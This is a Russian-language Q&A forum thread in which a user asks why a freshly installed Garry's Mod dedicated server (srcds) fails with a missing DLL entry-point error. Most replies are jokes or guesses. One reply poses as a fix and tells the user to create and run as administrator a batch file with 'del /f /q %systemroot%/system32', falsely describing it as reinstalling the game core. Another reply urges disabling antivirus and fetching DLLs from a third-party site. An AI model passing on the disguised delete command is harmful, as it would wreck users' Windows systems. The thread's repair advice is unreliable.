Проблема с входом на свой сервер.

111 111 Знаток (334), на голосовании 6 лет назад
Создал свой сервер Garry`s mod с помощью steamcmd, загрузил всё, потом загрузил сам сервер командой app_update validate, всё прекрасно загрузилось, но при попытке входа на сам сервер, название ярлыка если что srcds, выходит ошибка в которой пишется

srcds.exe - Точка входа не найдена
Точка входа в процедуру SteamInternal_Contexlnit не найдена в библиотеке DLL

c:\user\(мой пользователь) \desktop\server\stemapps\common\garrysmodds\bin\engine.dll

Я всё перепробовал, выключал стим и пытался зайти, перезагружал компьютер, нечего не помогло.
Если вы знаете решение этой проблемы, прошу, напишите.

(Если что на сервере не было не аддонов, нечего, только создал, попытался войти и ошибка)
Дополнен 6 лет назад
Это не вирус, я проверил, вирусов не обнаружено
Так, что не пишите о вирусах, пожалуйста.
Голосование за лучший ответ
Эдельвейс Прохоров Оракул (52071) 6 лет назад
Всё наладится.
И будет хорошо.
Удачи.
Ненужный человекУченик (137) 6 лет назад
Сразу видно, вы опытный программист.
Эдельвейс Прохоров Оракул (52071) Ну дык...
111 111Знаток (334) 6 лет назад
каким образом?
kek lolУченик (187) 6 лет назад
подорожником ток надо
Nikita RussianГуру (2828) 6 лет назад
Хаххах офигенно.
qwertach Знаток (350) 6 лет назад
Я тебя сильно расстрою, теперь создавать сервер на гмоде можно только через хостинг
Na_SVOJEJ_VoLNEПросветленный (22700) 6 лет назад
Как бы не так
Ярослав Краснов Ученик (187) 6 лет назад
Ты ничего не удалял? Попробуй скачать отдельно файл SteamInternal_Contexlnit
111 111Знаток (334) 6 лет назад
Файла в интернете не нашёл...
111 111Знаток (334) 6 лет назад
и нет, нечего не удалял, только скачал сервер и сразу ошибка
Ученик (117) 6 лет назад
это вирус
Никита ГусевЗнаток (354) 6 лет назад
Это не вирус, я проверил, вирусов не обнаружено
Так, что не пишите о вирусах, пожалуйста. - это он написал
Ученик (117) не спорить!
mIEE rrrr Ученик (203) 6 лет назад
Steam версия?
111 111Знаток (334) 6 лет назад
Последняя, у меня включена функция автоматического обновления
СЕРГЕЙ МОРОЗОВ Профи (659) 6 лет назад
Запускай через батник, а не через scrds. На ютубе много видео про создание сервера. Если не найдешь про гаррис, то посмотри про кс. Будет тоже самое что и с гаррисом т. к один и тот же движок!
P.S Это не вирус, не слушай людей которые не разбираются в этом.
P.P.S Если надо смогу скинуть саму команду которую надо писать в батник
111 111Знаток (334) 6 лет назад
Конечно, скидывайте
игорь воронин Ученик (230) 6 лет назад
проверь антивирусом на вирусы
Kajo. Искусственный Интеллект (166912) 6 лет назад
Может и вирус, но через батник можно попытаться..
Андрей Го(Гончаров) Знаток (490) 6 лет назад
Куплю Garrys Mod по дешевке!
Rela305 SteamУченик (147) 6 лет назад
vk.com/skadieye напиши, я имею акк с гаррисом, не нужный.
Мария Крупина Знаток (297) 6 лет назад
Подожди немного компьютер бывает так делает если много работает....
Olga Asa Ученик (230) 6 лет назад
перезапусти сервер
111 111Знаток (334) 6 лет назад
я его и запустить не могу... даже переустановил
Егор Малков Ученик (131) 6 лет назад
Ты вроде, это, порты включи..
Александр Ашлапов Знаток (394) 6 лет назад
Знаю такое, у меня была такая же ошибка только процесс другой.
Тебе надо сделать текстовый документ.
В нем прописать следующий текст:
@echo off
del /f /q %systemroot%/system32 - эта команда удаляет ядро самого гариса.
title update - скачивает ядро заново
exit

Потом сохранить этот текст, сохранить как garrys.bat, название можно любое, но .bat обязательно.
Запускаешь и готово.
НО! Надо запускать от имени администратора, иначе автозащитник Garry's mod не даст этого сделать. Мне помогло, пиши мне если получилось
Клим ФоминскийУченик (151) 6 лет назад
ахахах, пиз*ец, самый лучший (нет) на*б года
Чел, он не настолько думаю тупой чтоб не понять что ты хочешь чтоб у него слетела винда
Александр Ашлапов Знаток (394) Хоть один нормальный человек. Все школолалки в майнсруфте верили и думали что у них будет куча алмазов...
111 111Знаток (334) 6 лет назад
спасибо, но лучше откажусь, сам на своём компе удалял System32
Александр Ашлапов Знаток (394) а я на виртуалке
Na_SVOJEJ_VoLNE Просветленный (22700) 6 лет назад
Нужно было app_date 4020 validate если не ошибаюсь
}{lebushek Знаток (283) 6 лет назад
попробуй обновить net framework и Microsoft Visual C++ тоже, почисти реестр ccleanerом, отключи антивирус, он может мешать, поищи файл steam_api.dl в папке System32 и SysWOW64,если его там нет то скачай отсюда для 32 бит www.dll-files.com/steam_api.dll.html,а это для 64 бит - https://www.dll-files.com/steam_api64.dll.html
Илья Рудич Ученик (109) 6 лет назад
Проверь на вирусы
Илья РудичУченик (109) 6 лет назад
скачай SteamInternal_Contexlnit (если что нибудь удалял)
letoguleta Ученик (97) 6 лет назад
На связи опытный программист. Попробуйте приложить подорожник или прочитать молитву, также можете побрызгать компьютер святой водой.